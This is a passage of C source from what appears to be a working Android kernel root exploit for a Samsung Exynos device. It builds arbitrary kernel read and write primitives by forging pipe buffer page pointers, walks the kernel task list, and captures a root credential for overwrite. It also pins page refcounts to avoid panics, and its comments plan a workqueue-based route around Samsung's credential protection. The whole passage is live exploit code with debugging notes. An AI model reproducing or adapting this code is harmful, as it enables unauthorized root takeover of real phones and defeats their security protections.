static uintptr_t ghost_harden_value;    /* proven-walkable write value */

/* Keeper keep-list message: [magic u32][count u32][count x int indices]. */
struct ghost_keeper_msg {
    uint32_t magic;
    uint32_t count;
    int indices[GHOST_PIPE_MAX_SLOTS];
};

/* Tell the keeper to release every reclaim pipe (nothing forged).  Used on
 * abort paths that run before discovery, where the keeper must not keep its
 * 240 pipe reservations alive into the supervisor's retry (that is what
 * trips pipe-user-pages-hard and fails the next F_SETPIPE_SZ with EPERM). */
static void ghost_keeper_release_all(int ctrl_fd)
{
    struct ghost_keeper_msg msg;
    memset(&msg, 0, sizeof(msg));
    msg.magic = 0x43454550U; /* 'PEEK' */
    ssize_t mw = write(ctrl_fd, &msg, sizeof(msg));
    if (mw != (ssize_t)sizeof(msg)) {
        pr_warning("ghost root: keeper release short write %zd\n", mw);
    }
}

static void ghost_arm_pipes(void) {
    unsigned char buf[GHOST_PIPE_ARM_LEN];
    for (int i = 0; i < PIPE_RECLAIM; i++) {
        memset(buf, 0x40 + (i & 0x3f), (size_t)sizeof(buf));
        int fd = pipe_reclaim_write_fd(i);
        if (fd < 0) {
            continue;
        }
        ssize_t n = write(fd, buf, sizeof(buf));
        (void)n;
    }
}

/*
 * Image symbols on this kernel are aliased in the direct map at
 * DIRECT_MAP_BASE + slide + offset.  The kernel image is loaded at
 * physical 0 + slide (Samsung Exynos: kimage_voffset = kimage_vaddr -
 * phys_PC is constant, so __pa_symbol(x) = x - kimage_voffset = slide +
 * offset), and the linear map starts at phys 0 (memstart_addr == 0 on
 * this device -- verified empirically).
 *
 * Evidence for the +slide model:
 *  - The older alias (DIRECT_MAP_BASE + off only, no slide) read WRONG
 *    pages: phys 0x2501000 came back as a zero-headed page and phys
 *    0x17cb000 as a pointer-table page instead of the .rodata strings,
 *    while the pipe read path itself proved sound (deterministic data).
 *  - The +0x80000000+slide candidate faulted rb_erase on the FIRST
 *    hardening writes: it produced struct pages at phys ~2.09GB whose
 *    vmemmap section has pmd == 0 (not RAM on this device), confirming
 *    the image is NOT loaded at phys 0x80000000+off.
 *  - All image-page struct pages for alias DIRECT_MAP_BASE+slide+off
 *    land at pfn < 0x8000 (phys < 512MB, section 0, always mapped).
 *
 * The ghost pipe's `page` field and direct_to_page()/is_direct_ptr() all
 * operate on direct-map addresses, NOT image VAs (0xffffffc00...).
 * Feeding an image VA to direct_to_page() produces an out-of-range
 * vmemmap address that rb_erase walks -> panic (observed).
 */
static inline uintptr_t ghost_data_alias_fn(uintptr_t image_addr) {
    return DIRECT_MAP_BASE + kaslr_slide +
           (image_addr - KIMAGE_TEXT_BASE);
}
#define GHOST_DATA_ALIAS(image_macro) ghost_data_alias_fn((uintptr_t)(image_macro))

/* Learn which pipe sits at each of the 16 object slots of the base page. */
static int ghost_discover_slots(void) {
    for (int i = 0; i < GHOST_PIPE_MAX_SLOTS; i++) {
        ghost_slot_to_pipe[i] = -1;
    }
    ghost_mapped_count = 0;
    for (int i = 0; i < PIPE_RECLAIM; i++) {
        ghost_pipe_slot[i] = -1;
        ghost_pipe_consumed[i] = 0;
    }

    uintptr_t zero_page = direct_to_page(GHOST_DATA_ALIAS(EMPTY_ZERO_PAGE));
    for (int k = 0; k < GHOST_PIPE_MAX_SLOTS &&
                    ghost_mapped_count < GHOST_PIPE_MAX_MAPPED; k++) {
        uintptr_t slot_addr = ghost_pipe_base + (uintptr_t)k * PIPE_OBJECT_SIZE;
        if (ghost_write_once(slot_addr, zero_page) != 0) {
            pr_warning("ghost root: slot %d probe write failed\n", k);
            return -1;
        }
        for (int i = 0; i < PIPE_RECLAIM; i++) {
            if (ghost_pipe_slot[i] >= 0) {
                continue;
            }
            int fd = pipe_reclaim_read_fd(i);
            if (fd < 0) {
                continue;
            }
            unsigned char b = 0xff;
            ssize_t n = read(fd, &b, 1);
            if (n != 1) {
                continue;
            }
            ghost_pipe_consumed[i]++;
            if (b == 0x00) {
                ghost_slot_to_pipe[k] = i;
                ghost_pipe_slot[i] = k;
                ghost_mapped_pipes[ghost_mapped_count++] = i;
                pr_success("ghost root: pipe %d mapped to slot %d\n", i, k);
                break;
            }
        }
    }
    if (ghost_mapped_count == 0) {
        pr_warning("ghost root: no in-page reclaim pipe found\n");
        return -1;
    }
    ghost_next_read_pipe_idx = 0;
    pr_success("ghost root: mapped %d in-page pipes\n", ghost_mapped_count);
    return 0;
}

/*
 * Read up to `want` bytes of the kernel page containing `direct_addr` via the
 * next available mapped pipe.  Returns bytes read, or -1.  The returned data
 * starts at target-page offset `ghost_last_consumed` (the pipe buffer offset).
 */
static ssize_t ghost_read_page(uintptr_t direct_addr, unsigned char *out,
                               size_t want) {
    if (ghost_mapped_count == 0) {
        return -1;
    }
    for (int tries = 0; tries < ghost_mapped_count; tries++) {
        int idx = ghost_next_read_pipe_idx;
        ghost_next_read_pipe_idx =
            (ghost_next_read_pipe_idx + 1) % ghost_mapped_count;
        int pipe = ghost_mapped_pipes[idx];
        int slot = ghost_pipe_slot[pipe];
        int consumed = ghost_pipe_consumed[pipe];
        int avail = GHOST_PIPE_ARM_LEN - consumed;
        if (avail < 2) {
            continue;
        }
        uintptr_t slot_addr =
            ghost_pipe_base + (uintptr_t)slot * PIPE_OBJECT_SIZE;
        uintptr_t forge_page = direct_to_page(direct_addr);
        /*
         * Pin the forge page AND its artifact-reachable neighbors
         * (value-0x80 .. value+0x40) so any pipe that ends up pointing at any
         * of them -- the intended forge or the observed value-0x80 collateral
         * -- frees safely on a later put_page(), then forge the pipe.  ONE
         * helper exec (ghost_harden_region + ghost_write_once used to be two,
         * and ghost_harden_region skipped high-DRAM pages because
         * GHOST_HARDEN_SLOTS was only 4GB).  GHOST_HARDEN_SLOTS now spans the
         * whole 64GB direct map, so high-DRAM pages are pinned too -- the
         * read-path half of the 0x41-pad fix (the channel half lives in
         * ghost_chan_prep).
         */
        struct ghost_wr wr[6];
        int np = ghost_pin_region(forge_page, 2, 1, wr, 5);
        wr[np].target = slot_addr;
        wr[np].value  = forge_page;
        np++;
        if (ghost_write_batch(wr, (size_t)np) != 0) {
            pr_warning("ghost root: read pin/forge failed target=%016zx\n",
                       direct_addr);
            return -1;
        }
        ghost_pin_mark(wr, np - 1);
        pr_info("ghost root: read forge target=%016zx page=%016zx "
                "pipe=%d slot=%d consumed=%d avail=%d want=%zu\n",
                direct_addr, forge_page, pipe, slot, consumed, avail, want);
        size_t len = want;
        if (len > (size_t)(avail - 1)) {
            len = (size_t)(avail - 1);
        }
        int fd = pipe_reclaim_read_fd(pipe);
        if (fd < 0) {
            return -1;
        }
        ssize_t n = read(fd, out, len);
        if (n < 0) {
            pr_warning("ghost root: pipe read errno=%d\n", errno);
            return -1;
        }
        pr_info("ghost root: read got n=%zd first=%02x%02x%02x%02x "
                "%02x%02x%02x%02x consumed_before=%d\n", n, out[0],
                out[1], out[2], out[3], out[4], out[5], out[6], out[7],
                consumed);
        ghost_last_consumed = consumed;
        ghost_pipe_consumed[pipe] = consumed + (int)n;
        return n;
    }
    pr_warning("ghost root: all mapped pipes exhausted\n");
    return -1;
}

/* Read `len` bytes at a direct-map address (page-aligned under the hood). */
static int ghost_read_field(uintptr_t addr, void *out, size_t len) {
    unsigned char page[4096];
    uintptr_t page_addr = addr & ~0xfffULL;
    ssize_t n = ghost_read_page(page_addr, page, sizeof(page));
    if (n <= 0) {
        return -1;
    }
    int consumed = ghost_last_consumed;
    size_t off = (size_t)(addr & 0xfff);
    if (off < (size_t)consumed) {
        return -1;
    }
    size_t idx = off - (size_t)consumed;
    if (idx + len > (size_t)n) {
        return -1;
    }
    memcpy(out, page + idx, len);
    return 0;
}

/* ================= targeted read / byte write channel ================= */

/*
 * The round-robin read path (`ghost_read_page`) consumes a whole mapped pipe
 * per full-page read, which is too expensive for the workqueue-UMH root (it
 * reads scattered 8-byte pointers at heap addresses and then writes back small
 * counter/pointer updates).  These helpers instead use ONE dedicated pipe as a
 * channel:
 *
 *   drain it  -> re-arm with `off` bytes (buffer at offset 0) ->
 *   ghost-forge the buffer's `page` field (a walkable vmemmap pointer) ->
 *   read()/write() to hit the target page at exactly `off = addr & 0xfff`.
 *
 * READ:  arm `off+len` bytes, forge, read `off+len` back, return bytes [off..].
 * WRITE: arm `off` bytes, forge, write `len` (the CAN_MERGE append lands at
 *        buf->offset + buf->len == off).  Requires off > 0 and off+len <= 4096.
 *
 * The channel is fully drained before every op, so the only state that matters
 * is the ring head (advances once per re-arm).  Every forged page is
 * refcount-hardened first so the drain's put_page() is a no-op.
 */
static int ghost_chan_pipe = -1;
static int ghost_chan_head = 0;
static size_t ghost_chan_pending = 0;

static int ghost_chan_init(void) {
    if (ghost_chan_pipe >= 0) {
        return 0;
    }
    if (ghost_mapped_count == 0) {
        return -1;
    }
    ghost_chan_pipe = ghost_mapped_pipes[ghost_mapped_count - 1];
    ghost_chan_head = 1;   /* one buffer armed by ghost_arm_pipes() */
    ghost_chan_pending =
        (size_t)(GHOST_PIPE_ARM_LEN - ghost_pipe_consumed[ghost_chan_pipe]);
    return 0;
}

static int ghost_chan_drain(void) {
    int rfd = pipe_reclaim_read_fd(ghost_chan_pipe);
    if (rfd < 0) {
        return -1;
    }
    unsigned char tmp[512];
    while (ghost_chan_pending > 0) {
        size_t n = ghost_chan_pending > sizeof(tmp) ? sizeof(tmp)
                                                    : ghost_chan_pending;
        ssize_t got = read(rfd, tmp, n);
        if (got <= 0) {
            pr_warning("ghost root: chan drain failed pending=%zu errno=%d\n",
                       ghost_chan_pending, errno);
            return -1;
        }
        ghost_chan_pending -= (size_t)got;
    }
    return 0;
}

/* Drain, re-arm `arm_len` bytes, forge the new buffer's page field.
 * Returns 0 on success.  The new buffer sits at ring slot head & 31. */
static int ghost_chan_prep(uintptr_t direct_addr, size_t arm_len) {
    if (ghost_chan_init() != 0 || ghost_chan_drain() != 0) {
        return -1;
    }
    int wfd = pipe_reclaim_write_fd(ghost_chan_pipe);
    if (wfd < 0) {
        return -1;
    }

    int idx = ghost_chan_head & 31;
    if (arm_len > 0) {
        unsigned char pad[4096];
        memset(pad, 0x41, sizeof(pad));
        size_t left = arm_len;
        while (left > 0) {
            size_t n = left > sizeof(pad) ? sizeof(pad) : left;
            ssize_t wrote = write(wfd, pad, n);
            if (wrote <= 0) {
                pr_warning("ghost root: chan arm failed errno=%d\n", errno);
                return -1;
            }
            left -= (size_t)wrote;
        }
        ghost_chan_head++;
        ghost_chan_pending += arm_len;
    }

    int slot = ghost_pipe_slot[ghost_chan_pipe];
    uintptr_t buf_addr = ghost_pipe_base +
                         (uintptr_t)slot * PIPE_OBJECT_SIZE +
                         (uintptr_t)idx * 0x28;
    uintptr_t forge_page = direct_to_page(direct_addr);
    /*
     * Pin every page the NEXT channel drain's put_page() could free, then
     * forge the buffer, in ONE helper exec.  The drain releases the buffer
     * armed here, and the ghost-write mechanism can leave that buffer
     * pointing at the intended page OR at an artifact neighbor (collateral
     * value-0x80 through value+0x40 -- observed).  For high-DRAM targets
     * (pwq/pool/irq_desc live above 4GB phys) the old single-page pin missed
     * those neighbors, so a drain put_page() dropped a LIVE neighbor slab
     * page to refcount 0; the buddy allocator then re-handed it out as a
     * pipe data page and the 0x41 arm pad overwrote the live struct --
     * __queue_work and __ipi_send_mask DABT on 0x41414141414241 (it recurred
     * after the first pin landed).  GHOST_HARDEN_SLOTS now spans the full
     * 64GB direct map, so high-DRAM neighbors are pinned too, deduped through
     * ghost_harden_cache.
     *
     * put_page() resolves compound pages to their head, so for the order-3
     * pipe slab page (whose forge targets are compound tails) pin the
     * page-aligned head -- that covers the tails and every artifact neighbor
     * still inside the compound -- plus the single page just past the
     * compound (the +0x40 neighbor is a separate page).
     */
    struct ghost_wr chan_wr[8];
    int np = 0;
    if (direct_addr >= ghost_pipe_base &&
        direct_addr < ghost_pipe_base + PIPE_SLAB_SIZE) {
        uintptr_t head = direct_to_page(ghost_pipe_base);
        np += ghost_pin_region(head, 0, 0, chan_wr + np, 1);
        np += ghost_pin_region(head + ((uintptr_t)1 << MM_ORDER) *
                                    STRUCT_PAGE_SIZE,
                               0, 0, chan_wr + np, 1);
    } else {
        np += ghost_pin_region(forge_page, 2, 1, chan_wr + np, 7);
    }
    chan_wr[np].target = buf_addr;
    chan_wr[np].value  = forge_page;
    np++;
    if (ghost_write_batch(chan_wr, (size_t)np) != 0) {
        pr_warning("ghost root: chan pin/forge failed target=%016zx\n",
                   direct_addr);
        return -1;
    }
    ghost_pin_mark(chan_wr, np - 1);
    return 0;
}

/* Read `len` bytes at a direct-map address (must fit within one page). */
static int ghost_read_at(uintptr_t addr, void *out, size_t len) {
    size_t off = (size_t)(addr & 0xfff);
    if (off + len > 4096) {
        return -1;
    }
    if (ghost_chan_prep(addr, off + len) != 0) {
        return -1;
    }
    int rfd = pipe_reclaim_read_fd(ghost_chan_pipe);
    if (rfd < 0) {
        return -1;
    }
    unsigned char buf[4096];
    size_t total = off + len;
    size_t got = 0;
    while (got < total) {
        ssize_t n = read(rfd, buf + got, total - got);
        if (n <= 0) {
            pr_warning("ghost root: chan read failed errno=%d\n", errno);
            return -1;
        }
        got += (size_t)n;
    }
    ghost_chan_pending -= total;
    memcpy(out, buf + off, len);
    return 0;
}

/* Write `len` bytes at a direct-map address (must fit within one page and
 * start past offset 0).  The ghost pointer-write is NOT used here: it would
 * scribble the rb_erase parent into value+0, corrupting adjacent data. */
static int ghost_write_bytes(uintptr_t addr, const void *data, size_t len) {
    size_t off = (size_t)(addr & 0xfff);
    if (off == 0 || off + len > 4096) {
        pr_warning("ghost root: chan write bad geometry addr=%016zx "
                   "off=%zu len=%zu\n", addr, off, len);
        return -1;
    }
    if (ghost_chan_prep(addr, off) != 0) {
        return -1;
    }
    int wfd = pipe_reclaim_write_fd(ghost_chan_pipe);
    if (wfd < 0) {
        return -1;
    }
    const unsigned char *p = data;
    size_t left = len;
    while (left > 0) {
        ssize_t n = write(wfd, p, left);
        if (n <= 0) {
            pr_warning("ghost root: chan write failed errno=%d\n", errno);
            return -1;
        }
        p += n;
        left -= (size_t)n;
    }
    ghost_chan_pending += len;
    pr_info("ghost root: chan write addr=%016zx off=%zu len=%zu\n",
            addr, off, len);
    return 0;
}

/*
 * Read pid/prev/comm for one task.  comm always sits in the page at
 * (task + TASK_COMM_OFF) & ~0xfff; prev/pid are in that same page unless
 * task's page offset is in [0x858, 0xb28), in which case they sit one page
 * lower and need a second read.
 */
static int ghost_read_task_brief(uintptr_t task, uint32_t *pid_out,
                                 uint64_t *prev_out, char *comm_out) {
    uintptr_t comm_page = (task + TASK_COMM_OFF) & ~0xfffULL;
    unsigned char page[4096];
    ssize_t n = ghost_read_page(comm_page, page, sizeof(page));
    if (n <= 0) {
        return -1;
    }
    int consumed = ghost_last_consumed;
    size_t comm_idx = (size_t)((task + TASK_COMM_OFF) & 0xfff) -
                      (size_t)consumed;
    if (comm_idx + 16 > (size_t)n) {
        return -1;
    }
    if (comm_out) {
        memcpy(comm_out, page + comm_idx, 16);
        comm_out[16] = 0;
    }

    size_t pid_idx = (size_t)((task + TASK_PID_OFF) & 0xfff) - (size_t)consumed;
    size_t prev_idx = (size_t)((task + TASK_TASKS_OFF + 8) & 0xfff) -
                      (size_t)consumed;
    int straddle =
        ((task & 0xfff) >= 0x858) && ((task & 0xfff) < 0xb28);
    if (straddle) {
        unsigned char page0[4096];
        ssize_t n0 = ghost_read_page(task & ~0xfffULL, page0, sizeof(page0));
        if (n0 <= 0) {
            return -1;
        }
        int c0 = ghost_last_consumed;
        pid_idx = (size_t)((task + TASK_PID_OFF) & 0xfff) - (size_t)c0;
        prev_idx = (size_t)((task + TASK_TASKS_OFF + 8) & 0xfff) -
                   (size_t)c0;
        n = n0;
        memcpy(page, page0, (size_t)n0);
    }
    if (pid_idx + 4 > (size_t)n || prev_idx + 8 > (size_t)n) {
        return -1;
    }
    if (pid_out) {
        memcpy(pid_out, page + pid_idx, 4);
    }
    if (prev_out) {
        memcpy(prev_out, page + prev_idx, 8);
    }
    return 0;
}

/* Dump a read-back page hex (for diagnosing the read path). */
static void ghost_hex_dump(const char *tag, const unsigned char *p,
                           size_t n) {
    for (size_t off = 0; off < n; off += 16) {
        char line[160];
        int c = snprintf(line, sizeof(line), "ghost root: %s[%04zx]",
                         tag, off);
        for (size_t k = 0; k < 16 && off + k < n; k++) {
            c += snprintf(line + (size_t)c, sizeof(line) - (size_t)c, " %02x",
                          p[off + k]);
        }
        pr_info("%s", line);
    }
}

/* Walk the task list backward from init_task.tasks.prev to find our child. */
static int ghost_find_root_child(pid_t child_pid, uintptr_t *task_out) {
    uint64_t entry = 0;
    /*
     * Probe the read path with empty_zero_page before trusting it: forge
     * it through a mapped pipe and verify 64 bytes of pure zeros.  This
     * isolates a broken read mechanism (slot/offset/pipe state) from a bad
     * target value before we spend pipes on the task walk.
     */
    {
        /*
         * Verify the read path with empty_zero_page.  The pipe's buffer
         * window starts at target-page offset `consumed` (the slot probes
         * ate a few bytes), so do NOT use ghost_read_field (it requires the
         * field offset >= consumed and offset 0 always fails) -- read the
         * available window directly and verify every returned byte is zero.
         */
        unsigned char zp[256];
        ssize_t zr = ghost_read_page(GHOST_DATA_ALIAS(EMPTY_ZERO_PAGE), zp,
                                     sizeof(zp));
        if (zr <= 0) {
            pr_warning("ghost root: zero-page probe read failed\n");
            return -1;
        }
        int zbad = 0;
        for (ssize_t i = 0; i < zr; i++) {
            if (zp[i] != 0) {
                zbad = 1;
                break;
            }
        }
        if (zbad) {
            pr_warning("ghost root: zero-page probe NONZERO (read path "
                       "broken)\n");
            ghost_hex_dump("zp", zp, (size_t)zr);
            return -1;
        }
        pr_success("ghost root: zero-page probe read ok (%zd zero bytes, "
                   "read path sane)\n", zr);
    }

    uintptr_t init_task_addr = GHOST_DATA_ALIAS(INIT_TASK);
    if (ghost_read_field(init_task_addr + TASK_TASKS_OFF + 8, &entry, 8) !=
        0) {
        pr_warning("ghost root: init_task.tasks.prev read failed\n");
        return -1;
    }
    if (!is_direct_ptr((uintptr_t)entry)) {
        pr_warning("ghost root: bad init_task.tasks.prev=%016llx\n",
                   (unsigned long long)entry);
        return -1;
    }
    /*
     * Sanity: read init_task.comm and verify it is "swapper/0".  This
     * proves the read path returned the REAL init_task page (the previous
     * run read garbage -- init_task.tasks.prev came back as a non-kernel
     * pattern -- so verify the page content, not just the pointer shape).
     */
    char init_comm[17];
    memset(init_comm, 0, sizeof(init_comm));
    if (ghost_read_field(init_task_addr + TASK_COMM_OFF, init_comm, 16) != 0) {
        pr_warning("ghost root: init_task.comm read failed\n");
        return -1;
    }
    init_comm[16] = 0;
    if (memcmp(init_comm, "swapper/0", 9) != 0) {
        pr_warning("ghost root: init_task.comm mismatch '%s' "
                   "(read path returned wrong page)\n", init_comm);
        /* Dump what we read back so we can identify the page. */
        ghost_hex_dump("comm", (const unsigned char *)init_comm, 16);
        return -1;
    }
    pr_success("ghost root: init_task verified comm='%s' tasks.prev="
               "%016llx\n", init_comm, (unsigned long long)entry);
    uintptr_t task = (uintptr_t)entry - TASK_TASKS_OFF;
    for (int hop = 0; hop < GHOST_PIPE_MAX_WALK; hop++) {
        uint32_t pid = 0;
        uint64_t prev = 0;
        char comm[17] = {0};
        if (ghost_read_task_brief(task, &pid, &prev, comm) != 0) {
            pr_warning("ghost root: task brief read failed hop=%d task=%016zx\n",
                       hop, task);
            return -1;
        }
        pr_info("ghost root: walk hop=%d task=%016zx pid=%u comm='%s'\n",
                hop, task, pid, comm);
        if (pid == (uint32_t)child_pid) {
            *task_out = task;
            pr_success("ghost root: child task=%016zx pid=%u comm='%s' "
                       "hop=%d\n", task, pid, comm, hop);
            return 0;
        }
        if (!is_direct_ptr((uintptr_t)prev)) {
            pr_warning("ghost root: bad prev=%016llx hop=%d\n",
                       (unsigned long long)prev, hop);
            return -1;
        }
        task = (uintptr_t)prev - TASK_TASKS_OFF;
    }
    pr_warning("ghost root: child pid=%d not found in %d hops\n",
               child_pid, GHOST_PIPE_MAX_WALK);
    return -1;
}

/*
 * Capture a live, WRITABLE root cred for the cred overwrite.  init_cred
 * itself sits in .rodata on this kernel (offset 0x1b6cab8 lies between
 * __start_rodata 0x10f0000 and __end_rodata 0x215c000), so writing its
 * address into a task's cred makes the ghost write scribble the rb_erase
 * parent-color into read-only memory and panic (observed: write fault at
 * the linear alias of init_cred, DIRECT_MAP_BASE+slide+0x1b6cab8).
 *
 * pid 1 (init) is the oldest task -- the first entry after
 * init_task.tasks.next -- and its real_cred is a heap copy of init_cred
 * (uid 0, full caps) allocated at boot, i.e. writable.  Walk the list
 * FORWARD a few hops to find it and return its real_cred pointer.
 */
static uintptr_t ghost_root_cred_addr = 0;
static int ghost_capture_root_cred(void) {
    uint64_t next = 0;
    if (ghost_read_field(GHOST_DATA_ALIAS(INIT_TASK) + TASK_TASKS_OFF,
                         &next, 8) != 0) {
        pr_warning("ghost root: init_task.tasks.next read failed\n");
        return -1;
    }
    if (!is_direct_ptr((uintptr_t)next)) {
        pr_warning("ghost root: bad init_task.tasks.next=%016llx\n",
                   (unsigned long long)next);
        return -1;
    }
    uintptr_t task = (uintptr_t)next - TASK_TASKS_OFF;
    for (int hop = 0; hop < 8; hop++) {
        uint32_t pid = 0;
        uint64_t prev = 0;
        char comm[17] = {0};
        if (ghost_read_task_brief(task, &pid, &prev, comm) != 0) {
            pr_warning("ghost root: root cred walk read failed hop=%d\n",
                       hop);
            return -1;
        }
        pr_info("ghost root: root cred walk hop=%d task=%016zx pid=%u "
                "comm='%s'\n", hop, task, pid, comm);
        if (pid == 1 || pid == 2) {
            uintptr_t cred = 0;
            if (ghost_read_field(task + TASK_REAL_CRED_OFF, &cred, 8) != 0) {
                pr_warning("ghost root: pid%u real_cred read failed\n", pid);
                return -1;
            }
            if (!is_direct_ptr(cred)) {
                pr_warning("ghost root: bad pid%u cred=%016zx\n", pid,
                           cred);
                return -1;
            }
            /*
             * DIAG: read back the cred's head to prove it is a LIVE root
             * cred (uid==0, gid==0) before we ghost-write it into the
             * child.  The pipe window starts at target-page offset
             * `consumed`, so uid (cred+4) and gid (cred+8) are located at
             * consumed-relative indices 4-consumed / 8-consumed.  A
             * garbage cred (read path returned the wrong page) shows up
             * here as nonzero uid/gid, which predicts the deterministic
             * cred-write panic.
             */
            {
                unsigned char cb[64];
                memset(cb, 0, sizeof(cb));
                ssize_t cn = ghost_read_page(cred, cb, sizeof(cb));
                if (cn > 0) {
                    int cons = ghost_last_consumed;
                    uint32_t uid = 0, gid = 0;
                    int uidx = 4 - cons;
                    int gidx = 8 - cons;
                    if (uidx >= 0 && uidx + 4 <= (int)cn)
                        memcpy(&uid, cb + uidx, 4);
                    if (gidx >= 0 && gidx + 4 <= (int)cn)
                        memcpy(&gid, cb + gidx, 4);
                    pr_info("ghost root: cred head n=%zd consumed=%d "
                            "uid=%u gid=%u "
                            "hex=%02x%02x%02x%02x%02x%02x%02x%02x\n",
                            cn, cons, uid, gid, cb[0], cb[1], cb[2], cb[3],
                            cb[4], cb[5], cb[6], cb[7]);
                } else {
                    pr_warning("ghost root: cred head read failed\n");
                }
            }
            ghost_root_cred_addr = cred;
            pr_success("ghost root: captured writable root cred=%016zx "
                       "(pid%u comm='%s')\n", cred, pid, comm);
            return 0;
        }
        if (ghost_read_field(task + TASK_TASKS_OFF, &next, 8) != 0 ||
            !is_direct_ptr((uintptr_t)next)) {
            pr_warning("ghost root: bad next=%016llx hop=%d\n",
                       (unsigned long long)next, hop);
            return -1;
        }
        task = (uintptr_t)next - TASK_TASKS_OFF;
    }
    pr_warning("ghost root: no root task found in forward walk\n");
    return -1;
}

/*
 * ghost_install_root_cred() -- uid-0 root via cred overwrite.
 * Requires SELinux permissive and a resolved kaslr_base (call after
 * ghost_selinux_permissive(), which now parses the real slide from the
 * embedded binary's output).  Returns 0 on success, 1 on failure.
 */
/*
 * Refcount-hardening for kernel pages the ghost path forges into pipe
 * buffers.  free_pipe_info() at process exit put_page()s every pipe_buffer
 * it finds; if any of those point at a kernel-reserved page (empty_zero_page,
 * the boot-time bm_pmd/bm_pte page tables, init_task, ...) the kernel tries
 * to free a buddy page that was never allocated and panics in
 * free_unref_page (observed K2608130225, K2608130234, K2608130341,
 * K2608130347 -- the last freed bm_pmd, struct page 0xfffffffe00093fc0,
 * two struct pages below empty_zero_page).  The keeper only holds the pipes
 * discovery MAPPED; a write-mechanism artifact can forge a pipe that never
 * maps (collateral value = requested value - 0x80, observed), and a free
 * slot in the recovered slab page can be re-allocated as another pipe's bufs
 * carrying the leftover forged page pointer.  Make put_page() a no-op for
 * every page the ghost path can forge by pinning its struct page _refcount
 * (+0x34) to a large value with an extra ghost write -- the kernel image
 * pages are never freed, so the refcount is irrelevant to the kernel and
 * only needs to be big enough that put_page() never reaches zero.
 *
 * The ghost write can only carry walkable kernel values; the probes already
 * prove vmemmap struct-page addresses are safe values, so we use the zero
 * page's struct page as the value for every hardening write.
 */
#define GHOST_HARDEN_SLOTS  (1u << 24)   /* 64GB of RAM worth of struct pages */
static unsigned char ghost_harden_cache[GHOST_HARDEN_SLOTS / 8];

/* Queue a refcount-pin write for the forge page AND every neighbor the
 * ghost-write artifact can reach (value-0x80 through value+0x40, i.e.
 * below=2/above=1 -- a pipe can end up pointing at the collateral value
 * value-0x80 instead of the requested value, observed).  Make put_page() a
 * no-op for every page the ghost path can put_page(): the channel/read drain
 * releases the forged buffer, and if the page it points at is a LIVE slab
 * page (pool_workqueue / worker_pool / irq_desc) whose _refcount drops to 0,
 * the buddy allocator re-hands it out as a pipe data page and the 0x41 arm
 * pad overwrites the live struct (__queue_work / __ipi_send_mask DABT on
 * 0x41414141414241).
 *
 * GHOST_HARDEN_SLOTS spans the FULL 64GB direct map (DIRECT_MAP_BASE..
 * DIRECT_MAP_END), so high-DRAM pages -- pwq/pool/irq_desc and the reclaimed
 * pipe slab, all above 4GB phys on this device -- are pinned too, each
 * exactly once per run (deduped through ghost_harden_cache; call
 * ghost_pin_mark() only after the batch succeeds so a failed batch re-pins).
 * The pin value is a struct-page pointer (proven walkable) whose low 32 bits
 * are a large number, so put_page() never reaches zero.
 */
static int ghost_pin_region(uintptr_t forge_page, int below, int above,
                            struct ghost_wr *wr, int max)
{
    int n = 0;
    for (int d = -below; d <= above; d++) {
        uintptr_t page_struct = forge_page + (uintptr_t)d * STRUCT_PAGE_SIZE;
        if (page_struct < VMEMMAP_START) {
            continue;
        }
        uintptr_t slot = (page_struct - VMEMMAP_START) / STRUCT_PAGE_SIZE;
        if (slot >= GHOST_HARDEN_SLOTS) {
            continue;
        }
        if (ghost_harden_cache[slot >> 3] & (1u << (slot & 7))) {
            continue;   /* already pinned */
        }
        if (n >= max) {
            break;
        }
        wr[n].target = page_struct + 0x34;
        wr[n].value  = ghost_harden_value;
        n++;
    }
    return n;
}

/* Mark the pages queued by ghost_pin_region() as pinned (call only after the
 * batch that carried them succeeded). */
static void ghost_pin_mark(const struct ghost_wr *wr, int n)
{
    for (int i = 0; i < n; i++) {
        uintptr_t slot = (wr[i].target - 0x34 - VMEMMAP_START) /
                         STRUCT_PAGE_SIZE;
        if (slot < GHOST_HARDEN_SLOTS) {
            ghost_harden_cache[slot >> 3] |= (uint8_t)(1u << (slot & 7));
        }
    }
}

/* Harden the static forge targets: empty_zero_page and its neighbors
 * (bm_pte/bm_pmd sit 1-2 pages below it) and init_task's struct page.
 *
 * Run as ONE batched exec: per-page writes each re-arm the ghost topology
 * (12 execs -> 1), which is the dominant hardlockup risk on this device.
 */
#define GHOST_HARDEN_BATCH_MAX 64
static int ghost_harden_static_pages(void)
{
    uintptr_t zero_page =
        direct_to_page(GHOST_DATA_ALIAS(EMPTY_ZERO_PAGE));
    uintptr_t init_page =
        direct_to_page(GHOST_DATA_ALIAS(INIT_TASK));
    ghost_harden_value = zero_page;

    struct ghost_wr wr[GHOST_HARDEN_BATCH_MAX];
    int n = 0;
    for (int d = -4; d <= 2; d++) {
        uintptr_t pg = zero_page + (uintptr_t)d * STRUCT_PAGE_SIZE;
        uintptr_t slot = (pg - VMEMMAP_START) / STRUCT_PAGE_SIZE;
        if (pg < VMEMMAP_START || slot >= GHOST_HARDEN_SLOTS) {
            continue;
        }
        if (ghost_harden_cache[slot >> 3] & (1u << (slot & 7))) {
            continue;
        }
        wr[n].target = pg + 0x34;
        wr[n].value = ghost_harden_value;
        n++;
    }
    for (int d = -2; d <= 2; d++) {
        uintptr_t pg = init_page + (uintptr_t)d * STRUCT_PAGE_SIZE;
        uintptr_t slot = (pg - VMEMMAP_START) / STRUCT_PAGE_SIZE;
        if (pg < VMEMMAP_START || slot >= GHOST_HARDEN_SLOTS) {
            continue;
        }
        if (ghost_harden_cache[slot >> 3] & (1u << (slot & 7))) {
            continue;
        }
        wr[n].target = pg + 0x34;
        wr[n].value = ghost_harden_value;
        n++;
    }
    if (n == 0) {
        return 0;
    }
    pr_info("ghost root: harden batch n=%d\n", n);
    if (ghost_write_batch(wr, (size_t)n) != 0) {
        pr_warning("ghost root: harden batch failed\n");
        return -1;
    }
    for (int i = 0; i < n; i++) {
        uintptr_t slot = (wr[i].target - 0x34 - VMEMMAP_START) /
                         STRUCT_PAGE_SIZE;
        ghost_harden_cache[slot >> 3] |= (uint8_t)(1u << (slot & 7));
    }
    pr_success("ghost root: hardened static kernel pages (zero=%016zx "
               "init=%016zx)\n", zero_page, init_page);
    return 0;
}

/* ================= workqueue-UMH root (byte-write) ================= */

/*
 * The cred-overwrite route is dead on this device (Samsung KDP makes every
 * credential a hypervisor read-only cred_jar_ro; see AGENTS.md).  The
 * modprobe_path route is also dead (CONFIG_STATIC_USERMODEHELPER_PATH=""
 * turns every call_usermodehelper() into a no-op).  The surviving UMH route
 * is the workqueue injection that root.c uses on the Qualcomm targets:
